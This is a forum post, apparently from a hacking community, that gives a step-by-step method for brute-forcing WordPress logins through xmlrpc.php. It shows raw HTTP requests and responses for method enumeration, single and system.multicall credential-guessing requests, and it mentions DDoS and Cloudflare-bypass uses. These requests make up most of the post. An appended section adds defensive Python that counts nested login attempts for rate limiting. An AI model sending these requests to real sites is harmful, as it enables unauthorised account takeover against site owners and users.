September 18, 2022 at 2:10 PM
Hi all. Today I decided to make my first post in a series of "Everyday My Scanning Trip" threads to share some funny knowledge I have, or once had, on the hacking way with you, at least with some newbies like me. Hope you love my series. <3

[size=large]#1 Exploit xmlrpc.php on WordPress[/size]

I saw this vulnerability a long time ago, but because it was somehow useless I had forgotten it until now. When I scanned some website, I saw it appear again. So I'll share the way to have some fun with this vulnerability.

[align=center][attachment=985][/align]

[list=1]
[*] At first, you'll need Burp Suite Pro (or any software that lets you send the raw request).
[*] Ensure you are targeting a WordPress site.
[*] Ensure you have access to the xmlrpc.php file. In general, it is found at https://example.com/xmlrpc.php and will reply to a GET request with:
[code]XML-RPC server accepts POST requests only.[/code]
[*] It will be pointless to target an XML-RPC server which is disabled/hardcoded/tampered/not working. Therefore, we will check its functionality by sending the following request:
[code]POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 135

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>[/code]
The normal response should be:
[code]HTTP/1.1 200 OK
Date: Mon, 01 Jul 2019 17:13:30 GMT
Server: Apache
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Vary: Accept-Encoding
Referrer-Policy: no-referrer-when-downgrade
Content-Length: 4272
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params>
    <param>
      <value>
      <array><data>
  <value><string>system.multicall</string></value>
  <value><string>system.listMethods</string></value>
  <value><string>system.getCapabilities</string></value>
  <value><string>demo.addTwoNumbers</string></value>
  <value><string>demo.sayHello</string></value>
  <value><string>pingback.extensions.getPingbacks</string></value>
  <value><string>pingback.ping</string></value>
  <value><string>mt.publishPost</string></value>
  <value><string>mt.getTrackbackPings</string></value>
  <value><string>mt.supportedTextFilters</string></value>
  <value><string>mt.supportedMethods</string></value>
  <value><string>mt.setPostCategories</string></value>
  <value><string>mt.getPostCategories</string></value>
  <value><string>mt.getRecentPostTitles</string></value>
  <value><string>mt.getCategoryList</string></value>
  <value><string>metaWeblog.getUsersBlogs</string></value>
  <value><string>metaWeblog.deletePost</string></value>
  <value><string>metaWeblog.newMediaObject</string></value>
  <value><string>metaWeblog.getCategories</string></value>
  <value><string>metaWeblog.getRecentPosts</string></value>
  <value><string>metaWeblog.getPost</string></value>
  <value><string>metaWeblog.editPost</string></value>
  <value><string>metaWeblog.newPost</string></value>
  <value><string>blogger.deletePost</string></value>
  <value><string>blogger.editPost</string></value>
  <value><string>blogger.newPost</string></value>
  <value><string>blogger.getRecentPosts</string></value>
  <value><string>blogger.getPost</string></value>
  <value><string>blogger.getUserInfo</string></value>
  <value><string>blogger.getUsersBlogs</string></value>
  <value><string>wp.restoreRevision</string></value>
  <value><string>wp.getRevisions</string></value>
  <value><string>wp.getPostTypes</string></value>
  <value><string>wp.getPostType</string></value>
  <value><string>wp.getPostFormats</string></value>
  <value><string>wp.getMediaLibrary</string></value>
  <value><string>wp.getMediaItem</string></value>
  <value><string>wp.getCommentStatusList</string></value>
  <value><string>wp.newComment</string></value>
  <value><string>wp.editComment</string></value>
  <value><string>wp.deleteComment</string></value>
  <value><string>wp.getComments</string></value>
  <value><string>wp.getComment</string></value>
  <value><string>wp.setOptions</string></value>
  <value><string>wp.getOptions</string></value>
  <value><string>wp.getPageTemplates</string></value>
  <value><string>wp.getPageStatusList</string></value>
  <value><string>wp.getPostStatusList</string></value>
  <value><string>wp.getCommentCount</string></value>
  <value><string>wp.deleteFile</string></value>
  <value><string>wp.uploadFile</string></value>
  <value><string>wp.suggestCategories</string></value>
  <value><string>wp.deleteCategory</string></value>
  <value><string>wp.newCategory</string></value>
  <value><string>wp.getTags</string></value>
  <value><string>wp.getCategories</string></value>
  <value><string>wp.getAuthors</string></value>
  <value><string>wp.getPageList</string></value>
  <value><string>wp.editPage</string></value>
  <value><string>wp.deletePage</string></value>
  <value><string>wp.newPage</string></value>
  <value><string>wp.getPages</string></value>
  <value><string>wp.getPage</string></value>
  <value><string>wp.editProfile</string></value>
  <value><string>wp.getProfile</string></value>
  <value><string>wp.getUsers</string></value>
  <value><string>wp.getUser</string></value>
  <value><string>wp.getTaxonomies</string></value>
  <value><string>wp.getTaxonomy</string></value>
  <value><string>wp.getTerms</string></value>
  <value><string>wp.getTerm</string></value>
  <value><string>wp.deleteTerm</string></value>
  <value><string>wp.editTerm</string></value>
  <value><string>wp.newTerm</string></value>
  <value><string>wp.getPosts</string></value>
  <value><string>wp.getPost</string></value>
  <value><string>wp.deletePost</string></value>
  <value><string>wp.editPost</string></value>
  <value><string>wp.newPost</string></value>
  <value><string>wp.getUsersBlogs</string></value>
</data></array>
      </value>
    </param>
  </params>
</methodResponse>[/code]
Note that in the absence of the above-presented example response, it is rather pointless to proceed with actual testing of the two vulnerabilities. The response might vary based on the settings and configuration of the WordPress installation.
[*] If there is an output for system.listMethods, then it is recommended to interact with at least the most basic method, called demo.sayHello. Like this:
[code]Request:
POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 130

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
  <methodName>demo.sayHello</methodName>
  <params></params>
</methodCall>

Response:
HTTP/1.1 200 OK
Date: Mon, 01 Jul 2019 17:19:05 GMT
Server: Apache
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Vary: Accept-Encoding
Referrer-Policy: no-referrer-when-downgrade
Content-Length: 181
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params>
    <param>
      <value>
      <string>Hello!</string>
      </value>
    </param>
  </params>
</methodResponse>[/code]
[*] Exploit this vulnerability: this vulnerability has several ways to be exploited:
- Distributed denial-of-service (DDoS) attacks
- Cloudflare protection bypass
- XSPA (Cross Site Port Attack)
But usually the attacker uses it to brute force the superadmin user. The following request represents the most common brute force attack:
[code]POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 235

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value><string>{{your username}}</string></value></param>
    <param><value><string>{{your password}}</string></value></param>
  </params>
</methodCall>[/code]
The following request requires permissions for both the system.multicall and wp.getUsersBlogs methods:
[code]POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 1560

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
  <methodName>system.multicall</methodName>
  <params>
    <param><value><array><data>
      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
          <value><string>{{ Your Username }}</string></value>
          <value><string>{{ Your Password }}</string></value>
        </data></array></value></member>
      </struct></value>
      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
          <value><string>{{ Your Username }}</string></value>
          <value><string>{{ Your Password }}</string></value>
        </data></array></value></member>
      </struct></value>
      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
          <value><string>{{ Your Username }}</string></value>
          <value><string>{{ Your Password }}</string></value>
        </data></array></value></member>
      </struct></value>
      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
          <value><string>{{ Your Username }}</string></value>
          <value><string>{{ Your Password }}</string></value>
        </data></array></value></member>
      </struct></value>
    </data></array></value></param>
  </params>
</methodCall>[/code]
The response will look like:
[code]HTTP/1.1 200 OK
Date: Mon, 01 Jul 2019 23:02:55 GMT
Server: Apache
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Vary: Accept-Encoding
Referrer-Policy: no-referrer-when-downgrade
Content-Length: 1043
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params>
    <param>
      <value>
      <array><data>
  <value><struct>
  <member><name>faultCode</name><value><int>403</int></value></member>
  <member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value>
  <value><struct>
  <member><name>faultCode</name><value><int>403</int></value></member>
  <member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value>
  <value><struct>
  <member><name>faultCode</name><value><int>403</int></value></member>
  <member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value>
  <value><struct>
  <member><name>faultCode</name><value><int>403</int></value></member>
  <member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value>
</data></array>
      </value>
    </param>
  </params>
</methodResponse>[/code]
Or you could write or clone some git repositories to automate the brute force.
[*] Conclusion: because you need two big word lists, "usernames" and "passwords", to exploit this vulnerability, it wastes a lot of time and resources to get a result. Somehow, it's a useless vulnerability for attackers and bug bounty hunters (of course). But I hope you will have some fun on the tiring hacking way. Thank you!!
[/list]
[hr]
Oh, what happened? My longest post ever. It's so sad.
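As an added example (not part of the original post), here is the defender-side check the system.multicall trick above calls for: it parses an xmlrpc.php request body and counts how many credential checks it would trigger, so a login limiter can count nested calls instead of HTTP requests. The sample bodies are constructed here, not captured traffic, and the LOGIN_METHODS set is my own pick from the method list quoted above.

```python
import xml.etree.ElementTree as ET

# Methods taking (username, password), picked from the post's system.listMethods output.
LOGIN_METHODS = {"wp.getUsersBlogs", "blogger.getUsersBlogs",
                 "metaWeblog.getUsersBlogs", "blogger.getUserInfo"}

def _text(value):
    """Text of a <value>: its <string> child if present, else the bare text."""
    s = value.find("string") if value is not None else None
    return ((s.text if s is not None else getattr(value, "text", "")) or "").strip()

def count_login_attempts(body):
    """Count the credential checks one POST to xmlrpc.php triggers.
    A direct wp.getUsersBlogs call is one attempt; system.multicall wrapping
    N such calls is N attempts in one HTTP request, so a limiter that counts
    requests rather than nested calls never notices the brute force."""
    root = ET.fromstring(body)  # use defusedxml.ElementTree on untrusted input
    method = (root.findtext("methodName") or "").strip()
    attempts = []
    if method in LOGIN_METHODS:
        params = [_text(v) for v in root.findall("./params/param/value")]
        attempts.append((method, params[0] if params else ""))
    elif method == "system.multicall":
        for call in root.findall("./params/param/value/array/data/value/struct"):
            inner, user = "", ""
            for member in call.findall("member"):
                key = (member.findtext("name") or "").strip()
                if key == "methodName":
                    inner = _text(member.find("value"))
                elif key == "params":
                    params = [_text(v) for v in member.findall("value/array/data/value")]
                    user = params[0] if params else ""
            if inner in LOGIN_METHODS:
                attempts.append((inner, user))
    return {"attempts": len(attempts), "usernames": sorted({u for _, u in attempts})}

# Constructed sample bodies (not captured traffic); the struct repeated four
# times inside system.multicall mirrors the request shown in the post.
_STRUCT = ("<value><struct><member><name>methodName</name>"
           "<value><string>wp.getUsersBlogs</string></value></member>"
           "<member><name>params</name><value><array><data>"
           "<value><string>admin</string></value><value><string>{{password}}</string></value>"
           "</data></array></value></member></struct></value>")
SAMPLE_MULTICALL = ("<?xml version='1.0'?><methodCall><methodName>system.multicall</methodName>"
                    "<params><param><value><array><data>" + _STRUCT * 4
                    + "</data></array></value></param></params></methodCall>")
SAMPLE_SINGLE = ("<?xml version='1.0'?><methodCall><methodName>wp.getUsersBlogs</methodName>"
                 "<params><param><value><string>admin</string></value></param>"
                 "<param><value><string>{{password}}</string></value></param></params></methodCall>")
SAMPLE_HELLO = "<?xml version='1.0'?><methodCall><methodName>demo.sayHello</methodName><params/></methodCall>"
```

Feeding the multicall sample returns four attempts against one username, which is the number a per-account lockout should charge for that single request; the demo.sayHello body returns zero.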


